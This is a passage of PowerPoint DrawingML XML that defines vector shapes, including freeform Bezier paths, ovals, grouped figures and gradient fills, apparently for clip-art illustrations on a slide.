                        <a:moveTo>
                          <a:pt x="209" y="119"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="207" y="121"/>
                          <a:pt x="197" y="123"/>
                          <a:pt x="184" y="127"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="179" y="94"/>
                          <a:pt x="175" y="64"/>
                          <a:pt x="173" y="55"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="170" y="36"/>
                          <a:pt x="153" y="30"/>
                          <a:pt x="144" y="27"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="136" y="23"/>
                          <a:pt x="110" y="18"/>
                          <a:pt x="96" y="14"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="83" y="10"/>
                          <a:pt x="61" y="4"/>
                          <a:pt x="51" y="2"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="41" y="0"/>
                          <a:pt x="21" y="4"/>
                          <a:pt x="18" y="13"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="16" y="16"/>
                          <a:pt x="10" y="56"/>
                          <a:pt x="3" y="96"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3" y="96"/>
                          <a:pt x="3" y="96"/>
                          <a:pt x="3" y="96"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="99"/>
                          <a:pt x="2" y="99"/>
                          <a:pt x="2" y="99"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="99"/>
                          <a:pt x="2" y="99"/>
                          <a:pt x="2" y="99"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="109"/>
                          <a:pt x="4" y="116"/>
                          <a:pt x="9" y="118"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="14" y="121"/>
                          <a:pt x="20" y="120"/>
                          <a:pt x="26" y="119"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="33" y="117"/>
                          <a:pt x="33" y="117"/>
                          <a:pt x="33" y="117"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="33" y="117"/>
                          <a:pt x="33" y="117"/>
                          <a:pt x="33" y="117"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="34" y="117"/>
                          <a:pt x="35" y="117"/>
                          <a:pt x="36" y="116"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="38" y="116"/>
                          <a:pt x="41" y="115"/>
                          <a:pt x="43" y="114"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="76"/>
                          <a:pt x="44" y="76"/>
                          <a:pt x="44" y="76"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="76"/>
                          <a:pt x="42" y="77"/>
                          <a:pt x="41" y="77"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="60"/>
                          <a:pt x="44" y="49"/>
                          <a:pt x="44" y="53"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="59"/>
                          <a:pt x="43" y="123"/>
                          <a:pt x="43" y="171"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="177"/>
                          <a:pt x="47" y="182"/>
                          <a:pt x="53" y="183"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="67" y="186"/>
                          <a:pt x="102" y="197"/>
                          <a:pt x="111" y="199"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="120" y="200"/>
                          <a:pt x="138" y="190"/>
                          <a:pt x="140" y="177"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="140" y="175"/>
                          <a:pt x="140" y="173"/>
                          <a:pt x="140" y="171"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="140" y="139"/>
                          <a:pt x="140" y="139"/>
                          <a:pt x="140" y="139"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="140" y="124"/>
                          <a:pt x="140" y="111"/>
                          <a:pt x="139" y="98"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="138" y="92"/>
                          <a:pt x="137" y="87"/>
                          <a:pt x="137" y="84"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="136" y="82"/>
                          <a:pt x="136" y="80"/>
                          <a:pt x="136" y="79"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="136" y="80"/>
                          <a:pt x="136" y="82"/>
                          <a:pt x="137" y="84"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="138" y="88"/>
                          <a:pt x="138" y="93"/>
                          <a:pt x="139" y="98"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="140" y="108"/>
                          <a:pt x="142" y="120"/>
                          <a:pt x="145" y="136"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="145" y="136"/>
                          <a:pt x="145" y="137"/>
                          <a:pt x="145" y="137"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="145" y="137"/>
                          <a:pt x="145" y="137"/>
                          <a:pt x="145" y="137"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="145" y="142"/>
                          <a:pt x="145" y="142"/>
                          <a:pt x="145" y="142"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="148" y="154"/>
                          <a:pt x="151" y="161"/>
                          <a:pt x="155" y="165"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="159" y="169"/>
                          <a:pt x="164" y="170"/>
                          <a:pt x="170" y="171"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="186" y="167"/>
                          <a:pt x="204" y="161"/>
                          <a:pt x="223" y="155"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="254" y="147"/>
                          <a:pt x="236" y="110"/>
                          <a:pt x="209" y="119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74118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9" name="Freeform 1083">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FCBBB5E-FA77-4896-9FEC-E3E40045084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 flipH="1">
                    <a:off x="2419" y="2811"/>
                    <a:ext cx="82" cy="52"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 30 w 66"/>
                      <a:gd name="T1" fmla="*/ 39 h 41"/>
                      <a:gd name="T2" fmla="*/ 10 w 66"/>
                      <a:gd name="T3" fmla="*/ 23 h 41"/>
                      <a:gd name="T4" fmla="*/ 16 w 66"/>
                      <a:gd name="T5" fmla="*/ 13 h 41"/>
                      <a:gd name="T6" fmla="*/ 54 w 66"/>
                      <a:gd name="T7" fmla="*/ 16 h 41"/>
                      <a:gd name="T8" fmla="*/ 57 w 66"/>
                      <a:gd name="T9" fmla="*/ 29 h 41"/>
                      <a:gd name="T10" fmla="*/ 30 w 66"/>
                      <a:gd name="T11" fmla="*/ 39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6" h="41">
                        <a:moveTo>
                          <a:pt x="30" y="39"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="14" y="37"/>
                          <a:pt x="0" y="25"/>
                          <a:pt x="10" y="23"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="17" y="21"/>
                          <a:pt x="13" y="16"/>
                          <a:pt x="16" y="13"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="18" y="10"/>
                          <a:pt x="54" y="0"/>
                          <a:pt x="54" y="16"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="54" y="21"/>
                          <a:pt x="47" y="25"/>
                          <a:pt x="57" y="29"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="66" y="33"/>
                          <a:pt x="46" y="41"/>
                          <a:pt x="30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0" name="Oval 1084">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CA10922-32BB-4EA4-A90F-323FBC29A9BE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gray">
                  <a:xfrm>
                    <a:off x="2402" y="2736"/>
                    <a:ext cx="109" cy="109"/>
                  </a:xfrm>
                  <a:prstGeom prst="ellipse">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:soli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1615" name="Group 298">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5BA115D-7ADC-46CE-9710-AE914CC551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41223" y="3274879"/>
              <a:ext cx="2047877" cy="747713"/>
              <a:chOff x="249" y="2480"/>
              <a:chExt cx="1290" cy="471"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1937" name="Freeform 103">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{960D2EFC-875E-41EC-BC53-FC1007D5CF97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49" y="2605"/>
                <a:ext cx="1290" cy="346"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 161"/>
                  <a:gd name="T1" fmla="*/ 22 h 44"/>
                  <a:gd name="T2" fmla="*/ 81 w 161"/>
                  <a:gd name="T3" fmla="*/ 0 h 44"/>
                  <a:gd name="T4" fmla="*/ 161 w 161"/>
                  <a:gd name="T5" fmla="*/ 22 h 44"/>
                  <a:gd name="T6" fmla="*/ 81 w 161"/>
                  <a:gd name="T7" fmla="*/ 44 h 44"/>
                  <a:gd name="T8" fmla="*/ 0 w 161"/>
                  <a:gd name="T9" fmla="*/ 2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44">
                    <a:moveTo>
                      <a:pt x="0" y="22"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="81" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="44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C7013">
                      <a:gamma/>
                      <a:tint val="68627"/>
                      <a:invGamma/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="4C7013"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gradFill>
              <a:ln w="19050" cap="flat" cmpd="sng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938" name="Group 104">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD9C73FF-D340-4A4F-A0DB-E7F870E4CDEC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685" y="2480"/>
                <a:ext cx="295" cy="315"/>
                <a:chOff x="1658" y="2536"/>
                <a:chExt cx="596" cy="637"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="1939" name="Group 105">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{772B37A0-DD43-4CAF-BFF1-85C9F809394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876" y="2536"/>
                  <a:ext cx="378" cy="637"/>
                  <a:chOff x="1876" y="2536"/>
                  <a:chExt cx="378" cy="637"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="1945" name="Group 106">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C275CE27-964D-4F56-B63D-D0210769D6D6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1876" y="2536"/>
                    <a:ext cx="343" cy="637"/>
                    <a:chOff x="4178" y="782"/>
                    <a:chExt cx="343" cy="637"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="1955" name="Freeform 107">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AB0F6AB-C230-42EB-A9CB-D78100F91C0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4321" y="1088"/>
                      <a:ext cx="121" cy="331"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 89 w 90"/>
                        <a:gd name="T1" fmla="*/ 156 h 245"/>
                        <a:gd name="T2" fmla="*/ 89 w 90"/>
                        <a:gd name="T3" fmla="*/ 7 h 245"/>
                        <a:gd name="T4" fmla="*/ 89 w 90"/>
                        <a:gd name="T5" fmla="*/ 5 h 245"/>
                        <a:gd name="T6" fmla="*/ 63 w 90"/>
                        <a:gd name="T7" fmla="*/ 20 h 245"/>
                        <a:gd name="T8" fmla="*/ 12 w 90"/>
                        <a:gd name="T9" fmla="*/ 11 h 245"/>
                        <a:gd name="T10" fmla="*/ 3 w 90"/>
                        <a:gd name="T11" fmla="*/ 0 h 245"/>
                        <a:gd name="T12" fmla="*/ 3 w 90"/>
                        <a:gd name="T13" fmla="*/ 36 h 245"/>
                        <a:gd name="T14" fmla="*/ 2 w 90"/>
                        <a:gd name="T15" fmla="*/ 205 h 245"/>
                        <a:gd name="T16" fmla="*/ 43 w 90"/>
                        <a:gd name="T17" fmla="*/ 205 h 245"/>
                        <a:gd name="T18" fmla="*/ 45 w 90"/>
                        <a:gd name="T19" fmla="*/ 51 h 245"/>
                        <a:gd name="T20" fmla="*/ 36 w 90"/>
                        <a:gd name="T21" fmla="*/ 40 h 245"/>
                        <a:gd name="T22" fmla="*/ 45 w 90"/>
                        <a:gd name="T23" fmla="*/ 51 h 245"/>
                        <a:gd name="T24" fmla="*/ 43 w 90"/>
                        <a:gd name="T25" fmla="*/ 205 h 245"/>
                        <a:gd name="T26" fmla="*/ 44 w 90"/>
                        <a:gd name="T27" fmla="*/ 211 h 245"/>
                        <a:gd name="T28" fmla="*/ 88 w 90"/>
                        <a:gd name="T29" fmla="*/ 218 h 245"/>
                        <a:gd name="T30" fmla="*/ 89 w 90"/>
                        <a:gd name="T31" fmla="*/ 156 h 24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90" h="245">
                          <a:moveTo>
                            <a:pt x="89" y="156"/>
                          </a:moveTo>
                          <a:cubicBezTo>
                            <a:pt x="89" y="141"/>
                            <a:pt x="90" y="47"/>
                            <a:pt x="89" y="7"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="89" y="6"/>
                            <a:pt x="89" y="6"/>
                            <a:pt x="89" y="5"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="87" y="16"/>
                            <a:pt x="71" y="22"/>
                            <a:pt x="63" y="20"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="55" y="20"/>
                            <a:pt x="24" y="13"/>
                            <a:pt x="12" y="11"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="6" y="10"/>
                            <a:pt x="4" y="5"/>
                            <a:pt x="3" y="0"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="2" y="18"/>
                            <a:pt x="3" y="32"/>
                            <a:pt x="3" y="36"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="3" y="49"/>
                            <a:pt x="0" y="181"/>
                            <a:pt x="2" y="205"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="3" y="229"/>
                            <a:pt x="43" y="225"/>
                            <a:pt x="43" y="205"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="43" y="171"/>
                            <a:pt x="46" y="55"/>
                            <a:pt x="45" y="51"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="45" y="47"/>
                            <a:pt x="36" y="47"/>
                            <a:pt x="36" y="40"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="36" y="47"/>
                            <a:pt x="45" y="47"/>
                            <a:pt x="45" y="51"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="46" y="55"/>
                            <a:pt x="43" y="171"/>
                            <a:pt x="43" y="205"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="44" y="207"/>
                            <a:pt x="44" y="211"/>
                            <a:pt x="44" y="211"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="46" y="245"/>
                            <a:pt x="87" y="235"/>
                            <a:pt x="88" y="218"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="90" y="201"/>
                            <a:pt x="88" y="171"/>
                            <a:pt x="89" y="15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tx1"/>
                        </a:gs>
                        <a:gs pos="50000">
                          <a:schemeClr val="tx1">
                            <a:gamma/>
                            <a:tint val="74118"/>
                            <a:invGamma/>
                          </a:schemeClr>
                        </a:gs>
                        <a:gs pos="100000">
                          <a:schemeClr val="tx1"/>
                        </a:gs>
                      </a:gsLst>
                      <a:lin ang="0" scaled="1"/>
                    </a:gra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56" name="Freeform 108">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AA3DD0F-2918-4543-88BA-97967AA5078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4178" y="866"/>
                      <a:ext cx="343" cy="314"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 248 w 254"/>
                        <a:gd name="T1" fmla="*/ 194 h 232"/>
                        <a:gd name="T2" fmla="*/ 225 w 254"/>
                        <a:gd name="T3" fmla="*/ 49 h 232"/>
                        <a:gd name="T4" fmla="*/ 199 w 254"/>
                        <a:gd name="T5" fmla="*/ 24 h 232"/>
                        <a:gd name="T6" fmla="*/ 156 w 254"/>
                        <a:gd name="T7" fmla="*/ 13 h 232"/>
                        <a:gd name="T8" fmla="*/ 116 w 254"/>
                        <a:gd name="T9" fmla="*/ 2 h 232"/>
                        <a:gd name="T10" fmla="*/ 86 w 254"/>
                        <a:gd name="T11" fmla="*/ 12 h 232"/>
                        <a:gd name="T12" fmla="*/ 73 w 254"/>
                        <a:gd name="T13" fmla="*/ 86 h 232"/>
                        <a:gd name="T14" fmla="*/ 73 w 254"/>
                        <a:gd name="T15" fmla="*/ 86 h 232"/>
                        <a:gd name="T16" fmla="*/ 72 w 254"/>
                        <a:gd name="T17" fmla="*/ 91 h 232"/>
                        <a:gd name="T18" fmla="*/ 21 w 254"/>
                        <a:gd name="T19" fmla="*/ 104 h 232"/>
                        <a:gd name="T20" fmla="*/ 26 w 254"/>
                        <a:gd name="T21" fmla="*/ 135 h 232"/>
                        <a:gd name="T22" fmla="*/ 80 w 254"/>
                        <a:gd name="T23" fmla="*/ 122 h 232"/>
                        <a:gd name="T24" fmla="*/ 80 w 254"/>
                        <a:gd name="T25" fmla="*/ 122 h 232"/>
                        <a:gd name="T26" fmla="*/ 86 w 254"/>
                        <a:gd name="T27" fmla="*/ 120 h 232"/>
                        <a:gd name="T28" fmla="*/ 99 w 254"/>
                        <a:gd name="T29" fmla="*/ 113 h 232"/>
                        <a:gd name="T30" fmla="*/ 104 w 254"/>
                        <a:gd name="T31" fmla="*/ 92 h 232"/>
                        <a:gd name="T32" fmla="*/ 104 w 254"/>
                        <a:gd name="T33" fmla="*/ 92 h 232"/>
                        <a:gd name="T34" fmla="*/ 110 w 254"/>
                        <a:gd name="T35" fmla="*/ 47 h 232"/>
                        <a:gd name="T36" fmla="*/ 110 w 254"/>
                        <a:gd name="T37" fmla="*/ 47 h 232"/>
                        <a:gd name="T38" fmla="*/ 109 w 254"/>
                        <a:gd name="T39" fmla="*/ 164 h 232"/>
                        <a:gd name="T40" fmla="*/ 118 w 254"/>
                        <a:gd name="T41" fmla="*/ 175 h 232"/>
                        <a:gd name="T42" fmla="*/ 169 w 254"/>
                        <a:gd name="T43" fmla="*/ 189 h 232"/>
                        <a:gd name="T44" fmla="*/ 196 w 254"/>
                        <a:gd name="T45" fmla="*/ 169 h 232"/>
                        <a:gd name="T46" fmla="*/ 194 w 254"/>
                        <a:gd name="T47" fmla="*/ 88 h 232"/>
                        <a:gd name="T48" fmla="*/ 192 w 254"/>
                        <a:gd name="T49" fmla="*/ 75 h 232"/>
                        <a:gd name="T50" fmla="*/ 194 w 254"/>
                        <a:gd name="T51" fmla="*/ 88 h 232"/>
                        <a:gd name="T52" fmla="*/ 215 w 254"/>
                        <a:gd name="T53" fmla="*/ 204 h 232"/>
                        <a:gd name="T54" fmla="*/ 248 w 254"/>
                        <a:gd name="T55" fmla="*/ 194 h 2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</a:cxnLst>
                      <a:rect l="0" t="0" r="r" b="b"/>
                      <a:pathLst>
                        <a:path w="254" h="232">
                          <a:moveTo>
                            <a:pt x="248" y="194"/>
                          </a:moveTo>
                          <a:cubicBezTo>
                            <a:pt x="245" y="184"/>
                            <a:pt x="228" y="67"/>
                            <a:pt x="225" y="49"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="222" y="32"/>
                            <a:pt x="207" y="27"/>
                            <a:pt x="199" y="24"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="191" y="21"/>
                            <a:pt x="169" y="16"/>
                            <a:pt x="156" y="13"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="144" y="10"/>
                            <a:pt x="125" y="4"/>
                            <a:pt x="116" y="2"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="107" y="0"/>
                            <a:pt x="89" y="4"/>
                            <a:pt x="86" y="12"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="85" y="15"/>
                            <a:pt x="79" y="50"/>
                            <a:pt x="73" y="86"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="73" y="86"/>
                            <a:pt x="73" y="86"/>
                            <a:pt x="73" y="86"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="72" y="91"/>
                            <a:pt x="72" y="91"/>
                            <a:pt x="72" y="91"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="49" y="96"/>
                            <a:pt x="28" y="103"/>
                            <a:pt x="21" y="104"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="0" y="109"/>
                            <a:pt x="9" y="137"/>
                            <a:pt x="26" y="135"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="30" y="135"/>
                            <a:pt x="55" y="129"/>
                            <a:pt x="80" y="122"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="80" y="122"/>
                            <a:pt x="80" y="122"/>
                            <a:pt x="80" y="122"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="86" y="120"/>
                            <a:pt x="86" y="120"/>
                            <a:pt x="86" y="120"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="92" y="119"/>
                            <a:pt x="96" y="116"/>
                            <a:pt x="99" y="113"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="102" y="108"/>
                            <a:pt x="104" y="102"/>
                            <a:pt x="104" y="92"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="104" y="92"/>
                            <a:pt x="104" y="92"/>
                            <a:pt x="104" y="92"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="107" y="69"/>
                            <a:pt x="109" y="49"/>
                            <a:pt x="110" y="47"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="110" y="47"/>
                            <a:pt x="110" y="47"/>
                            <a:pt x="110" y="47"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="110" y="53"/>
                            <a:pt x="109" y="122"/>
                            <a:pt x="109" y="164"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="110" y="169"/>
                            <a:pt x="112" y="174"/>
                            <a:pt x="118" y="175"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="130" y="177"/>
                            <a:pt x="162" y="187"/>
                            <a:pt x="169" y="189"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="177" y="190"/>
                            <a:pt x="193" y="181"/>
                            <a:pt x="196" y="169"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="196" y="141"/>
                            <a:pt x="196" y="111"/>
                            <a:pt x="194" y="88"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="193" y="82"/>
                            <a:pt x="193" y="78"/>
                            <a:pt x="192" y="75"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="193" y="79"/>
                            <a:pt x="194" y="83"/>
                            <a:pt x="194" y="88"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="197" y="110"/>
                            <a:pt x="204" y="150"/>
                            <a:pt x="215" y="204"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="221" y="232"/>
                            <a:pt x="254" y="218"/>
                            <a:pt x="248" y="194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tx1"/>
                        </a:gs>
                        <a:gs pos="50000">
                          <a:schemeClr val="tx1">
                            <a:gamma/>
                            <a:tint val="74118"/>
                            <a:invGamma/>
                          </a:schemeClr>
                        </a:gs>
                        <a:gs pos="100000">
                          <a:schemeClr val="tx1"/>
                        </a:gs>
                      </a:gsLst>
                      <a:lin ang="0" scaled="1"/>
                    </a:gra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57" name="Freeform 109">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A2E309B-95E8-492D-B527-F4E0148D10C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4340" y="852"/>
                      <a:ext cx="89" cy="55"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 29 w 66"/>
                        <a:gd name="T1" fmla="*/ 39 h 41"/>
                        <a:gd name="T2" fmla="*/ 9 w 66"/>
                        <a:gd name="T3" fmla="*/ 22 h 41"/>
                        <a:gd name="T4" fmla="*/ 15 w 66"/>
                        <a:gd name="T5" fmla="*/ 12 h 41"/>
                        <a:gd name="T6" fmla="*/ 53 w 66"/>
                        <a:gd name="T7" fmla="*/ 16 h 41"/>
                        <a:gd name="T8" fmla="*/ 57 w 66"/>
                        <a:gd name="T9" fmla="*/ 29 h 41"/>
                        <a:gd name="T10" fmla="*/ 29 w 66"/>
                        <a:gd name="T11" fmla="*/ 39 h 4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66" h="41">
                          <a:moveTo>
                            <a:pt x="29" y="39"/>
                          </a:moveTo>
                          <a:cubicBezTo>
                            <a:pt x="13" y="37"/>
                            <a:pt x="0" y="25"/>
                            <a:pt x="9" y="22"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="16" y="21"/>
                            <a:pt x="13" y="15"/>
                            <a:pt x="15" y="12"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="18" y="10"/>
                            <a:pt x="53" y="0"/>
                            <a:pt x="53" y="16"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="53" y="21"/>
                            <a:pt x="47" y="25"/>
                            <a:pt x="57" y="29"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="66" y="33"/>
                            <a:pt x="46" y="41"/>
                            <a:pt x="29" y="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3175" cap="flat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58" name="Oval 110">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9426AA9A-58CA-47BB-BE32-38A90EC6564C}"/>
                        </a:ext>
                      </a:extLst>
                    </p:cNvPr>
                    <p:cNvSpPr>
                      <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </p:cNvSpPr>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr bwMode="gray">
                    <a:xfrm flipH="1">
                      <a:off x="4331" y="782"/>
                      <a:ext cx="106" cy="10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6350" algn="ctr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946" name="Group 111">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D88DB726-46D6-4365-8C66-81552635FA11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127" y="2897"/>
                    <a:ext cx="127" cy="137"/>
                    <a:chOff x="2408" y="1629"/>
                    <a:chExt cx="127" cy="137"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="1948" name="Freeform 112">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA5050F5-FB4A-4A75-9276-EB28AE7826D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2408" y="1645"/>
                      <a:ext cx="127" cy="34"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
